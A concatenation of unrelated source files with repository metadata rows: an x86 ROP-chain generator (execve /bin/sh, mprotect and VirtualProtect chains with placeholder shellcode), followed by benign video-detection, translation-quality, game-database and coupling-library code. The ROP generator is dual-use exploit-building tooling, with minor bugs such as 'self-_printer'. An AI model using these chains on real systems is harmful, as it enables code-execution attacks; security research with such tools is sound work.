def _createNumberNeg(self, number, reg=None, badRegs=None, dontModify=None):
if number == 0:
raise RopChainError('Cannot build number gadget with neg if number is 0!')
neg = self._find(Category.NEG_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not neg:
raise RopChainError('Cannot build number gadget with neg!')
pop = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs, dontModify=dontModify)
if not pop:
raise RopChainError('Cannot build number gadget with neg!')
toReturn = self._printRopInstruction(pop)
toReturn += self._printPaddingInstruction(toHex((~number)+1)) # two's complement
toReturn += self._printRopInstruction(neg)
return (toReturn, reg,)
def _createNumber(self, number, reg=None, badRegs=None, dontModify=None, xchg=True):
try:
if self._containsZeroByte(number):
try:
return self._createNumberNeg(number, reg, badRegs,dontModify)
except RopChainError as e:
if number < 50:
try:
return self._createNumberXOR(number, reg, badRegs,dontModify)
except RopChainError:
try:
return self._createNumberPop(number, reg, badRegs,dontModify)
except RopChainError:
try:
return self._createNumberSubtract(number, reg, badRegs,dontModify)
except RopChainError:
return self._createNumberAddition(number, reg, badRegs,dontModify)
else :
try:
return self._createNumberSubtract(number, reg, badRegs,dontModify)
except RopChainError:
return self._createNumberAddition(number, reg, badRegs,dontModify)
else:
popReg =self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build number gadget!')
toReturn = self._printRopInstruction(popReg)
toReturn += self._printPaddingInstruction(toHex(number,4))
return (toReturn , popReg.category[2]['dst'])
except:
return self._createNumberXchg(number, reg, badRegs, dontModify)
def _createAddress(self, address, reg=None, badRegs=None, dontModify=None):
popReg = self._find(Category.LOAD_REG, reg=reg, badDst=badRegs,dontModify=dontModify)
if not popReg:
raise RopChainError('Cannot build address gadget!')
toReturn = ''
toReturn += self._printRopInstruction(popReg,False)
toReturn += self._printRebasedAddress(toHex(address, 4), idx=self._usedBinaries.index((popReg._binary, popReg._section)))
regs = self._paddingNeededFor(popReg)
for i in range(len(regs)):
toReturn +=self._printPaddingInstruction()
return (toReturn,popReg.category[2]['dst'])
def _createSyscall(self, reg=None, badRegs=None, dontModify=None):
syscall = self._find(Category.SYSCALL, reg=None, badDst=None, dontModify=dontModify)
if not syscall:
raise RopChainError('Cannot build syscall gadget!')
toReturn = ''
toReturn += self._printRopInstruction(syscall)
return (toReturn,)
def _createOpcode(self, opcode):
return self._printRopInstruction(self._searchOpcode(opcode))
def _searchOpcode(self, opcode):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.virtualAddress
gadgets.extend(
r.searchOpcode(section.bytes, opcode.decode('hex'), section.offset, True, section=section))
if len(gadgets) > 0:
return gadgets[0]
else:
raise RopChainError('Cannot create gadget for opcode: %x' % opcode)
def create(self):
pass
class RopChainX86System(RopChainX86):
@classmethod
def name(cls):
return 'execve'
def _createCommand(self, what, where, reg=None, dontModify=[], idx=0):
if len(what) % 4 > 0:
what = '/' * (4 - len(what) % 4) + what
return self._createWriteStringWhere(what,where, idx=idx)
def create(self, cmd='/bin/sh'):
if len(cmd.split(' ')) > 1:
raise RopChainError('No argument support for execve commands')
self._printer.printInfo('ROPchain Generator for syscall execve:\n')
self._printer.println('\nwrite command into data section\neax 0xb\nebx address to cmd\necx address to null\nedx address to null\n')
section = self._binaries[0].getSection(b'.data')
length = math.ceil(float(len(cmd))/4) * 4
chain = self._printHeader()
chain_tmp = '\n'
chain_tmp += self._createCommand(cmd,section.struct.sh_offset+0x1000)[0]
badregs = []
while True:
ret = self._createNumber(0x0, badRegs=badregs)
chain_tmp += ret[0]
try:
chain_tmp += self._createWriteRegValueWhere(ret[1], section.struct.sh_offset+0x1000+length)[0]
break
except BaseException as e:
raise e
badregs.append(ret[1])
gadgets = []
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']))
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000+length],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']))
gadgets.append((self._createAddress, [section.struct.sh_offset+0x1000+length],{'reg':'edx'},['edx', 'dx', 'dl', 'dh']))
gadgets.append((self._createNumber, [0xb],{'reg':'eax'},['eax', 'ax', 'al', 'ah']))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp += self._createDependenceChain(gadgets)
try:
self._printer.printInfo('Look for syscall gadget')
chain_tmp += self._createSyscall()[0]
self._printer.printInfo('syscall gadget found')
except RopChainError:
try:
self._printer.printInfo('No syscall gadget found!')
self._printer.printInfo('Look for int 0x80 opcode')
chain_tmp += self._createOpcode('cd80')
self._printer.printInfo('int 0x80 opcode found')
except:
try:
self._printer.printInfo('No int 0x80 opcode found')
self._printer.printInfo('Look for call gs:[0x10] opcode')
chain_tmp += self._createOpcode('65ff1510000000')
self._printer.printInfo('call gs:[0x10] found')
except RopChainError:
self._printer.printInfo('No call gs:[0x10] opcode found')
chain += self._printRebase()
chain += 'rop = \'\'\n'
chain += chain_tmp
chain += 'print rop'
print(chain)
class RopChainX86Mprotect(RopChainX86):
"""
Builds a ropchain for mprotect syscall
eax 0x7b
ebx address
ecx size
edx 0x7 -> RWE
"""
@classmethod
def name(cls):
return 'mprotect'
def _createJmp(self, reg='esp'):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.virtualAddress
gadgets.extend(
r.searchJmpReg(section.bytes, reg, vaddr, section=section))
if len(gadgets) > 0:
if (gadgets[0]._binary, gadgets[0]._section) not in self._usedBinaries:
self._usedBinaries.append((gadgets[0]._binary, gadgets[0]._section))
return self._printRopInstruction(gadgets[0])
else:
return None
def __extract(self, param):
if not match('0x[0-9a-fA-F]{1,8},0x[0-9a-fA-F]+', param) or not match('0x[0-9a-fA-F]{1,8},[0-9]+', param):
raise RopChainError('Parameter have to have the following format: <hexnumber>,<hexnumber> or <hexnumber>,<number>')
split = param.split(',')
if isHex(split[1]):
return (int(split[0], 16), int(split[1], 16))
else:
return (int(split[0], 16), int(split[1], 10))
def create(self, param=None):
if not param:
raise RopChainError('Missing parameter: address:size')
address, size = self.__extract(param)
self._printer.printInfo('ROPchain Generator for syscall mprotect:\n')
self._printer.println('eax 0x7b\nebx address\necx size\nedx 0x7 -> RWE\n')
chain = self._printHeader()
chain += 'shellcode = \'\\xcc\'*100\n\n'
gadgets = []
gadgets.append((self._createNumber, [address],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']))
gadgets.append((self._createNumber, [size],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']))
gadgets.append((self._createNumber, [0x7],{'reg':'edx'},['edx', 'dx', 'dl', 'dh']))
gadgets.append((self._createNumber, [0x7d],{'reg':'eax'},['eax', 'ax', 'al', 'ah']))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp = ''
chain_tmp += self._createDependenceChain(gadgets)
try:
self._printer.printInfo('Look for syscall gadget')
chain_tmp += self._createSyscall()[0]
self._printer.printInfo('syscall gadget found')
except RopChainError:
chain_tmp += '\n# ADD HERE SYSCALL GADGET\n\n'
self._printer.printInfo('No syscall gadget found!')
self._printer.printInfo('Look for jmp esp')
jmp_esp = self._createJmp()
if jmp_esp:
self._printer.printInfo('jmp esp found')
chain_tmp += jmp_esp
else:
self-_printer.printInfo('no jmp esp found')
chain_tmp += '\n# ADD HERE JMP ESP\n\n'
chain += self._printRebase()
chain += '\nrop = \'\'\n'
chain += chain_tmp
chain += 'rop += shellcode\n\n'
chain += 'print(rop)\n'
print(chain)
class RopChainX86VirtualProtect(RopChainX86):
"""
Builds a ropchain for a VirtualProtect call using pushad
eax 0x90909090
ecx old protection (writable addr)
edx 0x40 (RWE)
ebx size
esp address
ebp return address (jmp esp)
esi pointer to VirtualProtect
edi ret (rop nop)
"""
@classmethod
def name(cls):
return 'virtualprotect'
def _createPushad(self):
pushad = self._find(Category.PUSHAD)
if pushad:
return self._printRopInstruction(pushad)
else:
self._printer.printInfo('No pushad found!')
return '# Add here PUSHAD gadget!'
def _createJmp(self, reg='esp'):
r = Ropper(self._binaries[0])
gadgets = []
for section in self._binaries[0].executableSections:
vaddr = section.offset
gadgets.extend(
r.searchJmpReg(section.bytes, reg, vaddr, section=section))
if len(gadgets) > 0:
if (gadgets[0]._binary, gadgets[0]._section) not in self._usedBinaries:
self._usedBinaries.append((gadgets[0]._binary, gadgets[0]._section))
return gadgets[0]
else:
return ''
def __extract(self, param):
if (not match('0x[0-9a-fA-F]{1,8},0x[0-9a-fA-F]+', param)) and (not match('0x[0-9a-fA-F]+', param)):
raise RopChainError('Parameter have to have the following format: <hexnumber>,<hexnumber> or <hexnumber>')
split = param.split(',')
if len(split) == 2:
if isHex(split[1]):
return (int(split[0], 16), int(split[1], 16))
else:
return (None, int(split[0], 16))
def __getVirtualProtectEntry(self):
for binary in self._binaries:
if binary.type == Type.PE:
s = binary.sections['.idata']
for descriptorData in s.importDescriptorTable:
for function in descriptorData.functions:
if str(function[1]) == 'VirtualProtect':
return function[2]
else:
self._printer.printError('File is not a PE file.')
return None
def create(self, param=None):
if not param:
raise RopChainError('Missing parameter: address,size or size')
self._printer.printInfo('Ropchain Generator for VirtualProtect:\n')
self._printer.println('eax 0x90909090\necx old protection (writable addr)\nedx 0x40 (RWE)\nebx size\nesp address\nebp return address (jmp esp)\nesi pointer to VirtualProtect\nedi ret (rop nop)\n')
address, size = self.__extract(param)
given = False
if not address:
address = self.__getVirtualProtectEntry()
if not address:
self._printer.printError('No IAT-Entry for VirtualProtect found!')
raise RopChainError('No IAT-Entry for VirtualProtect found and no address is given')
else:
given = True
writeable_ptr = self._binaries[0].getWriteableSection().offset + 0x4
jmp_esp = self._createJmp()
ret_addr = self._searchOpcode('c3')
chain = self._printHeader()
chain += '\n\nshellcode = \'\\xcc\'*100\n\n'
gadgets = []
to_extend = []
chain_tmp = ''
try:
self._printer.printInfo('Try to create gadget to fill esi with content of IAT address: %s' % address)
chain_tmp += self._createLoadRegValueFrom('esi', address)[0]
if given:
gadgets.append((self._createNumber, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al','esi','si']))
else:
gadgets.append((self._createAddress, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al','esi','si']))
to_extend = ['esi','si']
except:
self._printer.printInfo('Cannot create fill esi gadget!')
self._printer.printInfo('Try to create this chain:\n')
self._printer.println('eax Pointer to VirtualProtect\necx old protection (writable addr)\nedx 0x40 (RWE)\nebx size\nesp address\nebp return address (jmp esp)\nesi pointer to jmp [eax]\nedi ret (rop nop)\n')
jmp_eax = self._searchOpcode('ff20') # jmp [eax]
gadgets.append((self._createAddress, [jmp_eax.lines[0][0]],{'reg':'esi'},['esi','si']))
if given:
gadgets.append((self._createNumber, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al']))
else:
gadgets.append((self._createAddress, [address],{'reg':'eax'},['eax', 'ax', 'ah', 'al']))
gadgets.append((self._createNumber, [size],{'reg':'ebx'},['ebx', 'bx', 'bl', 'bh']+to_extend))
gadgets.append((self._createAddress, [writeable_ptr],{'reg':'ecx'},['ecx', 'cx', 'cl', 'ch']+to_extend))
gadgets.append((self._createAddress, [jmp_esp.lines[0][0]],{'reg':'ebp'},['ebp', 'bp']+to_extend))
gadgets.append((self._createNumber, [0x40],{'reg':'edx'},['edx', 'dx', 'dh', 'dl']+to_extend))
gadgets.append((self._createAddress, [ret_addr.lines[0][0]],{'reg':'edi'},['edi', 'di']+to_extend))
self._printer.printInfo('Try to create chain which fills registers without delete content of previous filled registers')
chain_tmp += self._createDependenceChain(gadgets)
self._printer.printInfo('Look for pushad gadget')
chain_tmp += self._createPushad()
chain += self._printRebase()
chain += 'rop = \'\'\n'
chain += chain_tmp
chain += 'rop += shellcode\n\n'
chain += 'print(rop)\n'
print(chain)
| gpl-2.0 | -8,572,569,844,129,845,000 | 39.707537 | 218 | 0.562022 | false |
myfavouritekk/TPN | tools/propagate/regression_propagation.py | 1 | 6216 | #!/usr/bin/env python
# --------------------------------------------------------
# Test regression propagation on ImageNet VID video
# Modified by Kai KANG ([email protected])
# --------------------------------------------------------
"""Test a Fast R-CNN network on an image database."""
import argparse
import pprint
import time
import os
import os.path as osp
import sys
import cPickle
import numpy as np
this_dir = osp.dirname(__file__)
# add caffe-mpi path
sys.path.insert(0, osp.join(this_dir, '../../external/caffe-mpi/build/install/python'))
import caffe
# add py-faster-rcnn paths
sys.path.insert(0, osp.join(this_dir, '../../external/py-faster-rcnn/lib'))
from fast_rcnn.craft import im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
# add external libs
sys.path.insert(0, osp.join(this_dir, '../../external'))
from vdetlib.utils.protocol import proto_load, proto_dump
# add src libs
sys.path.insert(0, osp.join(this_dir, '../../src'))
from tpn.propagate import roi_propagation
from tpn.target import add_track_targets
from tpn.data_io import save_track_proto_to_zip
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Test a Fast R-CNN network')
parser.add_argument('vid_file')
parser.add_argument('box_file')
parser.add_argument('save_file', help='Save zip file')
parser.add_argument('--annot_file', default=None,
help='Ground truth annotation file. [None]')
parser.add_argument('--job', dest='job_id', help='Job slot, GPU ID + 1. [1]',
default=1, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--param', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--num_per_batch', dest='boxes_num_per_batch',
help='split boxes to batches. [32]',
default=32, type=int)
parser.add_argument('--bbox_mean', dest='bbox_mean',
help='the mean of bbox',
default=None, type=str)
parser.add_argument('--bbox_std', dest='bbox_std',
help='the std of bbox',
default=None, type=str)
parser.add_argument('--bbox_pred_layer', dest='bbox_pred_layer',
help='Layer name for bbox regression layer in feature net.',
default='bbox_pred_vid', type=str)
parser.add_argument('--scheme', help='Propagation scheme. [weighted]',
choices=['max', 'mean', 'weighted'], default='weighted')
parser.add_argument('--length', type=int, default=9,
help='Propagation length. [9]')
parser.add_argument('--sample_rate', type=int, default=1,
help='Temporal subsampling rate. [1]')
parser.add_argument('--offset', type=int, default=0,
help='Offset of sampling. [0]')
parser.add_argument('--wait', dest='wait',
help='wait until net file exists',
default=True, type=bool)
parser.add_argument('--gpus', nargs='+', default=None, type=int, help='Available GPUs.')
parser.add_argument('--zip', action='store_true',
help='Save as zip files rather than track protocols')
parser.add_argument('--keep_feat', action='store_true',
help='Keep feature.')
parser.set_defaults(vis=False, zip=False, keep_feat=False)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print 'Called with args:'
print args
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.job_id - 1
print 'Using config:'
pprint.pprint(cfg)
while not os.path.exists(args.caffemodel) and args.wait:
print 'Waiting for {} to exist...'.format(args.caffemodel)
time.sleep(10)
caffe.set_mode_gpu()
if args.gpus is None:
caffe.set_device(args.job_id - 1)
else:
assert args.job_id <= len(args.gpus)
caffe.set_device(args.gpus[args.job_id-1])
net = caffe.Net(args.prototxt, args.caffemodel, caffe.TEST)
net.name = os.path.splitext(os.path.basename(args.caffemodel))[0]
# apply bbox regression normalization on the net weights
with open(args.bbox_mean, 'rb') as f:
bbox_means = cPickle.load(f)
with open(args.bbox_std, 'rb') as f:
bbox_stds = cPickle.load(f)
net.params[args.bbox_pred_layer][0].data[...] = \
net.params[args.bbox_pred_layer][0].data * bbox_stds[:, np.newaxis]
net.params[args.bbox_pred_layer][1].data[...] = \
net.params[args.bbox_pred_layer][1].data * bbox_stds + bbox_means
vid_proto = proto_load(args.vid_file)
box_proto = proto_load(args.box_file)
track_proto = roi_propagation(vid_proto, box_proto, net, im_detect, scheme=args.scheme,
length=args.length, sample_rate=args.sample_rate,
keep_feat=args.keep_feat, batch_size=args.boxes_num_per_batch)
# add ground truth targets if annotation file is given
if args.annot_file is not None:
annot_proto = proto_load(args.annot_file)
add_track_targets(track_proto, annot_proto)
if args.zip:
save_track_proto_to_zip(track_proto, args.save_file)
else:
proto_dump(track_proto, args.save_file)
| mit | 8,607,709,763,917,852,000 | 38.341772 | 92 | 0.591055 | false |
qe-team/marmot | marmot/experiment/context_utils.py | 1 | 15242 | from __future__ import print_function, division
import sys
import numpy as np
from collections import Counter
###########################################################################
#
# This file contains different functions for generation of non-standard
# contexts (contexts where each 'token' is a list of words)
#
###########################################################################
# return the window of a list
# add symbols '_START_' and '_END_' if the range exceeds the length of the list
def negative_window(my_list, start, end):
res = []
while start < 0:
res.append('_START_')
start += 1
while start < min(end, len(my_list)):
res.append(my_list[start])
start += 1
while end > len(my_list):
res.append('_END_')
end -= 1
return res
def create_context_ngram(repr_dict, order, test=False, unambiguous=False, bad_tagging="pessimistic"):
'''
:param repr_dict: a dict representing a 'line' or 'sentence' or a 'segment'
:return: a list of context objects representing the data for each token in the sequence
'''
context_list = []
# is checked before in create_contexts, but who knows
if 'target' not in repr_dict:
print("No 'target' label in data representations")
return []
if 'tags' not in repr_dict:
print("No 'tag' label in data representations or wrong format of tag")
print(repr_dict)
return []
active_keys = repr_dict.keys()
active_keys.remove('tags')
tag_map = {'OK': 1, 'BAD': 0}
# if the order is greater than 1, we need to have the equal number of ngrams for each word
# so we need to go beyond the borders of a sentence:
# "this is my younger brother" has 3 3-grams: "this is my", "is my younger" and "my younger brother"
# "my" participates in 3 trigrams, other words in 2 or less.
# but we need all words to participate in 3 3-grams, so we create the following trigrams:
# "_START_ _START_ this", "_START_ this is", "this is my", "is my younger" and "my younger brother", "younger brother _END_", "brother _END_ _END_"
#logger.info("Order: {}".format(order))
for i in range(len(repr_dict['target']) + order - 1):
#logger.info("Word {}".format(i))
c = {}
#logger.info("Negative window from {} to {}, length {}".format(i - order + 1, i + 1, len(repr_dict['target'])))
c['token'] = negative_window(repr_dict['target'], i - order + 1, i + 1)
c['index'] = (i - order + 1, i + 1)
# we take only tags for the existing tags
# i.e. for the sequence "_START_ _START_ it" the tag will be the tag for "it" only
tags = [tag_map[t] for t in repr_dict['tags'][max(0, i-order+1):min(len(repr_dict['tags']), i+1)]]
c['tag'] = np.average(tags)
for k in active_keys:
c[k] = repr_dict[k]
context_list.append(c)
return context_list
# create a new segmentation that divides only "GOOD" segments
# and keeps "BAD" segments unchanged
# TODO: add new ways of segmenting? (e.g. keep BAD segments untouched)
def error_based_segmentation(repr_dict):
# borders between segments with different labels
score_borders = [(i, i+1) for i in range(len(repr_dict['tags'])-1) if repr_dict['tags'][i] != repr_dict['tags'][i+1]]
# borders of phrases provided by Moses
segmentation_borders = [(j-1, j) for (i, j) in repr_dict['segmentation']][:-1]
# join both border types so that all phrases have unambiguous scores
# and there are no too long segments
new_borders = sorted(set(score_borders + segmentation_borders))
new_segments = []
prev = 0
# convert new borders to segments
for border in new_borders:
new_segments.append((prev, border[1]))
prev = border[1]
new_segments.append((new_borders[-1][1], len(repr_dict['target'])))
return new_segments
# we don't really need the order here, it should always be None
# or anything else
# :test: -- True if data is test data, False if training -- test sentences can have empty source-segmentation field (if Moses failed to produce constrained reference for them)
# :only_target: -- True if only target sentence is segmented, needs to be processed without source segmentation
# :bad_tagging: -- tag all phrases with at least one bad word as "BAD"
# if seg to False - only phrases with 50% or more bad words are tagged as "BAD"
# :tags_format: -- 'word': one tag per word (conversion to phrase-level tags needed),
# 'phrase': one tag per phrase (no conversion needed)
def create_context_phrase(repr_dict, order=None, unambiguous=False, test=False, bad_tagging="pessimistic", tags_format='word'):
'''
:param repr_dict: a dict representing a 'line' or 'sentence' or a 'segment'
:return: a list of context objects representing the data for each token in the sequence
'''
#print("CONTEXT CREATOR for a sentence")
#print(repr_dict)
# how many words had to change their tag from good to bad and vise versa
good2bad, bad2good = 0, 0
context_list = []
# is checked before in create_contexts, but who knows
if 'target' not in repr_dict:
print("No 'target' label in data representations")
return []
if 'tags' not in repr_dict:
print("No 'tag' label in data representations or wrong format of tag")
print(repr_dict)
return []
if 'segmentation' not in repr_dict or len(repr_dict['segmentation']) == 0:
# for the test data assuming that sentences without segmentation consist of one-word segments
if test:
repr_dict['segmentation'] = [(i, i+1) for i in range(len(repr_dict['target']))]
# for the training data omitting sentences without segmentation
else:
# print("No 'segmentation' label in data representations")
return []
if unambiguous:
assert('source_segmentation' not in repr_dict or len(repr_dict['source_segmentation']) == 0), "Error-based segmentation of target can't be performed if source segmentation exists -- after re-segmentation source and target segments won't match"
assert(not test), "Error-based segmentation can't be applied to the test set"
#print("Unambiguous")
print("Old segmentation: ", repr_dict['segmentation'])
repr_dict['segmentation'] = error_based_segmentation(repr_dict)
print("New segmentation: ", repr_dict['segmentation'])
# no source segmentation means that no Moses segmentation was produced
# in the training data we leave these sentences out
# in the test data they are processed as normal
# assuming that every target word is a separate segment
active_keys = repr_dict.keys()
active_keys.remove('tags')
if 'source_segmentation' in repr_dict:
active_keys.remove('source_segmentation')
if len(repr_dict['source_segmentation']) != 0 and len(repr_dict['source_segmentation']) != len(repr_dict['segmentation']):
print("Wrong segmentation lengths: ", repr_dict)
sys.exit()
for idx, (i, j) in enumerate(repr_dict['segmentation']):
c = {}
c['token'] = repr_dict['target'][i:j]
c['index'] = (i, j)
# source phrase from the phrase segmentation
if 'source_segmentation' in repr_dict and len(repr_dict['source_segmentation']) != 0:
src_seg = repr_dict['source_segmentation'][idx]
c['source_token'] = repr_dict['source'][src_seg[0]:src_seg[1]]
c['source_index'] = (src_seg[0], src_seg[1])
# source phrase from the alignments
elif 'alignments' in repr_dict:
alignments = []
for ii in range(c['index'][0], c['index'][1]):
try:
cur_align = repr_dict['alignments'][ii]
if cur_align is not None:
alignments.append(repr_dict['alignments'][ii])
except IndexError:
print("Indices: {} to {}, current: {}".format(c['index'][0], c['index'][1], ii))
print("Alignments: ", repr_dict['alignments'])
print("Representation: ", repr_dict)
sys.exit()
# converted to set to remove duplicates
# converted back to list because set doesn't support indexing
alignments = list(set(alignments))
if len(alignments) == 0:
c['source_token'] = []
c['source_index'] = ()
# source phrase -- substring between the 1st and the last word aligned to the target phrase
# (unaligned words in between are included)
else:
c['source_token'] = [repr_dict['source'][ii] for ii in alignments]
c['source_index'] = (alignments[0], alignments[-1] + 1)
else:
c['source_token'] = []
c['source_index'] = ()
if len(c['token']) == 0:
print("No token: from {} to {} in target: ".format(i, j), repr_dict['target'], repr_dict['source'], repr_dict['segmentation'])
if j == 0:
print("j==0!")
print("Target: '{}', segmentation: {}, {}".format(' '.join(repr_dict['target']), i, j))
if i == j or (len(repr_dict['tags'][i:j]) == 0 and tags_format == 'word') or len(repr_dict['target'][i:j]) == 0:
print("i==j!")
print("Target: '{}', tags: '{}' segmentation: {}, {}".format(' '.join([w.encode('utf-8') for w in repr_dict['target']]), ' '.join(repr_dict['tags']), i, j))
tags_cnt = Counter(repr_dict['tags'][i:j])
# super-pessimistic tagging -- if BAD occurs any number of times - the final tag is BAD
bad_all = tags_cnt['BAD']
good_all = tags_cnt['OK']
if tags_format == 'word':
if bad_tagging == "super_pessimistic":
if tags_cnt['BAD'] > 0:
c['tag'] = 'BAD'
good2bad += good_all
else:
c['tag'] = 'OK'
# pessimistic tagging -- if BAD occurs in 1 of 3 words or more often -- the final tag is BAD
elif bad_tagging == "pessimistic":
if tags_cnt['BAD']/len(repr_dict['tags'][i:j]) < 0.3:
c['tag'] = 'OK'
bad2good += bad_all
else:
c['tag'] = 'BAD'
good2bad += good_all
# optimisic - if OK occurs as much or more than BAD - the final tag is OK
elif bad_tagging == "optimistic":
if tags_cnt['OK'] >= tags_cnt['BAD']:
bad2good += bad_all
c['tag'] = 'OK'
else:
c['tag'] = 'BAD'
good2bad += good_all
else:
print("Unknown tag assignment scheme: {}".format(bad_tagging))
sys.exit()
elif tags_format == 'phrase':
c['tag'] = repr_dict['tags'][idx]
else:
print("Unknown tags format: {}".format(tags_format))
sys.exit()
for k in active_keys:
c[k] = repr_dict[k]
context_list.append(c)
return context_list, good2bad, bad2good
# create contexts where 'token' is an ngram of arbitrary length
# data_type is always 'plain' (no 'sequential' or 'token' for now)
# :order: -- order of ngram
# :data_type: -- 'plain' - data is a flat list
# 'sequential' - data is a list of sequences (used for dev and test)
def create_contexts_ngram(data_obj, order=None, data_type='plain', test=False, unambiguous=False, bad_tagging="pessimistic", tags_format='word'):
'''
:param data_obj: an object representing a dataset consisting of files
:param data_type:
:return:
'''
print("ENTER CONTEXTS CREATOR")
contexts = []
if 'target' not in data_obj:
print("No 'target' label in data representations")
return []
if 'tags' not in data_obj:
print("No 'tag' label in data representations or wrong format of tag")
return []
if 'segmentation' in data_obj:
context_generator = create_context_phrase
else:
if order is None:
print("The order of ngrams has to be defined to create the ngram contexts")
return []
context_generator = create_context_ngram
print("Sentences in the data: {}".format(len(data_obj['target'])))
if 'target_file' in data_obj:
data_obj.pop('target_file')
if 'source_file' in data_obj:
data_obj.pop('source_file')
overall = 0
good2bad, bad2good = 0, 0
if data_type == 'plain':
print("DATATYPE: PLAIN")
print(len(data_obj.values()))
for r_key in data_obj:
print("{} -- {} values".format(r_key, len(data_obj[r_key])))
# print(zip(*data_obj.values())[0])
for s_idx, sents in enumerate(zip(*data_obj.values())):
#print("SENTENCE {}".format(s_idx))
# all_out = create_context_phrase({data_obj.keys()[i]: sents[i] for i in range(len(sents))}, order, test=test, unambiguous=unambiguous, bad_tagging=bad_tagging)
# print("ALL: ", all_out)
#(cont, good, bad) = create_context_phrase({data_obj.keys()[i]: sents[i] for i in range(len(sents))}, order, test=test, unambiguous=unambiguous, bad_tagging=bad_tagging)
all_out = create_context_phrase({data_obj.keys()[i]: sents[i] for i in range(len(sents))}, order, test=test, unambiguous=unambiguous, bad_tagging=bad_tagging, tags_format=tags_format)
if len(all_out) < 3:
continue
good2bad += all_out[1]
bad2good += all_out[2]
overall += len(all_out[0])
# print("Type of the generated context: ", type(cont))
contexts.extend(all_out[0])
# print("Contexts: {}".format(overall))
elif data_type == 'sequential':
print("SEQUENTIAL")
for s_idx, sents in enumerate(zip(*data_obj.values())):
all_out = create_context_phrase({data_obj.keys()[i]: sents[i] for i in range(len(sents))}, order, test=test, unambiguous=unambiguous, bad_tagging=bad_tagging, tags_format=tags_format)
if len(all_out) < 3:
continue
#print("SEQ CONTEXTS: {}".format(len(cont)))
good2bad += all_out[1]
bad2good += all_out[2]
overall += len(all_out[0])
contexts.append(all_out[0])
else:
print("UNKNOWN DATATYPE: {}".format(data_type))
print("Good to bad: {}\nBad to good: {}, \nTotal: {}".format(good2bad, bad2good, overall))
return contexts
# output a flat list of numbers
# a number for each context -- means the number of words this context represents
def get_contexts_words_number(contexts):
numbers_list = []
for c in contexts:
try:
numbers_list.append(len(c['token']))
except TypeError:
print("Erroneous context: ", c)
print("List: ", contexts)
print("The 'token' field has to be of type 'list', is actually {}".format(type(c['token'])))
sys.exit()
return numbers_list
| isc | -6,508,214,843,344,275,000 | 46.335404 | 251 | 0.584635 | false |
TunnelBlanket/Houdini | Houdini/Data/Stamp.py | 1 | 1225 | # coding: utf-8
from sqlalchemy import Column, Integer, SmallInteger, text, ForeignKey
from sqlalchemy.orm import relationship
from Houdini.Data import Base
metadata = Base.metadata
class Stamp(Base):
__tablename__ = 'stamp'
PenguinID = Column(ForeignKey(u'penguin.ID', ondelete=u'CASCADE', onupdate=u'CASCADE'), primary_key=True, nullable=False)
Stamp = Column(SmallInteger, primary_key=True, nullable=False)
Recent = Column(Integer, nullable=False, server_default=text("1"))
penguin = relationship(u'Penguin')
class CoverStamp(Base):
__tablename__ = 'cover_stamps'
PenguinID = Column(ForeignKey(u'penguin.ID', ondelete=u'CASCADE', onupdate=u'CASCADE'), primary_key=True, nullable=False)
Stamp = Column(SmallInteger, primary_key=True, nullable=False, server_default=text("0"))
X = Column(SmallInteger, nullable=False, server_default=text("0"))
Y = Column(SmallInteger, nullable=False, server_default=text("0"))
Type = Column(SmallInteger, nullable=False, server_default=text("0"))
Rotation = Column(SmallInteger, nullable=False, server_default=text("0"))
Depth = Column(SmallInteger, nullable=False, server_default=text("0"))
penguin = relationship(u'Penguin') | mit | -1,121,676,306,723,954,800 | 41.275862 | 125 | 0.726531 | false |
Crompulence/cpl-library | examples/interactive_plot_example/python/CFD_recv_and_plot_grid_interactive.py | 1 | 3724 | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.widgets import Slider
from mpi4py import MPI
from cplpy import CPL
from draw_grid import draw_grid
#initialise MPI and CPL
comm = MPI.COMM_WORLD
CPL = CPL()
CFD_COMM = CPL.init(CPL.CFD_REALM)
nprocs_realm = CFD_COMM.Get_size()
# Parameters of the cpu topology (cartesian grid)
npxyz = np.array([1, 1, 1], order='F', dtype=np.int32)
NProcs = np.product(npxyz)
xyzL = np.array([10.0, 10.0, 10.0], order='F', dtype=np.float64)
xyz_orig = np.array([0.0, 0.0, 0.0], order='F', dtype=np.float64)
ncxyz = np.array([16, 6, 16], order='F', dtype=np.int32)
if (nprocs_realm != NProcs):
print("Non-coherent number of processes in CFD ", nprocs_realm,
" no equal to ", npxyz[0], " X ", npxyz[1], " X ", npxyz[2])
MPI.Abort(errorcode=1)
#Setup coupled simulation
cart_comm = CFD_COMM.Create_cart([npxyz[0], npxyz[1], npxyz[2]])
CPL.setup_cfd(cart_comm, xyzL, xyz_orig, ncxyz)
#Plot output
fig, ax = plt.subplots(1,1)
plt.subplots_adjust(bottom=0.25)
